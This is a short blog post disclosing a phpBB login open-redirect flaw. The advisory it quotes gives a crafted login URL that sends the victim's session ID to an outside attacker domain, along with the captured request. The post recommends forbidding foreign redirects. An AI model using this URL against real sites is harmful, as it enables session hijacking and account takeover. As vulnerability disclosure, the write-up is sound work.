hack0r.net

Yesterday I informed the phpBB devolpers of a flaw I found, but they neglected this issue and told me that such vulnerabilites are unavoidable. Further they told me, that the session id on its own does not provide access, because there are some other parameters that get checked, like the User-Agent header and something they described as a “very similar IP”. I didn’t look into the implementation, so I don’t know what he meant, but this seems like some interesting implementation.

But lets not get too much into the detail before you know what this is all about. That is what I send to the phpBB security tracker:

I. Problem Description

It is possible for an attacker to gain the SessionID from a victim. The
attacker has to bring the victim to visit a link like

http://www.phpBB-app.com/ucp.php?mode=login&redirect=http://mydoma.in/saveSID.

This will reset the hidden redirect input field on the resulting page to
“http://mydoma.in/saveSID”. If the victim now logs in he will be
redirected to this URL appended with the sid as GET parameter, which
looks like this on the attackers server:
—
GET /saveSID?sid=2d26f6b2f4fc7cf39d3d742e7ca4795e HTTP/1.1
Host: mydoma.in
[...]
—

II. Impact

The leaked SessionID can be used to continue other users sessions and
therefore gaining control over their account.

III. Solution

I would recommend to not allow redirects to foreign domains at all, as
it does not seem to make sense to me.

Lets get back to their objections. The first check, against the User-Agent header really does not provide any security at all, as the attacker only has to copy it from the request he received from the victim.

The second is much more tricky as is comparatively easy to forge an IP, but pretty hard to receive the response to such a request. Well, at least to my knowledge. As far as i could see they use nonces as a session riding prevention, so you need to have the nonce to do state-changing requests.

But nevertheless, I think the sid parameter should be tried as good as possible not to be leaked outside the domain. Maybe someone else knows how to exploit this or somewhen someone will find a way to do so.

Popularity: unranked [?]